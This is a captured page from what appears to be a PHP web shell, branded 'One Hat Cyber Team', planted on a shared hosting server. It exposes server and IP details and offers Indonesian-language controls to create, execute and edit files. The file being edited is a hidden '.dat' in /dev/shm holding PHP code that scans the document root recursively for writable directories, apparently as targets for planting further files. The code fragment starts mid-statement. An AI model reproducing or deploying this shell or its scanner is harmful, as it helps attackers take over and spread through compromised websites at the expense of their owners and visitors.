⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.235
Server IP:
162.0.217.164
Server:
Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
dev
/
shm
/
Edit File: .dat
{$res}@{$o}\n"; } function scan($path, $root) { if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { $p = $path . DIRECTORY_SEPARATOR . $file; if ($file != '.' && $file != '..') { if (is_link($p)) { continue; } elseif (is_dir($p)) { if (is_writable($p)) { check($p, $root); } scan($p, $root); } } } } } $r = $_SERVER['DOCUMENT_ROOT']; if (is_writable($r)) { check($r, $r); } scan($r, $r); die('!ended!');
Simpan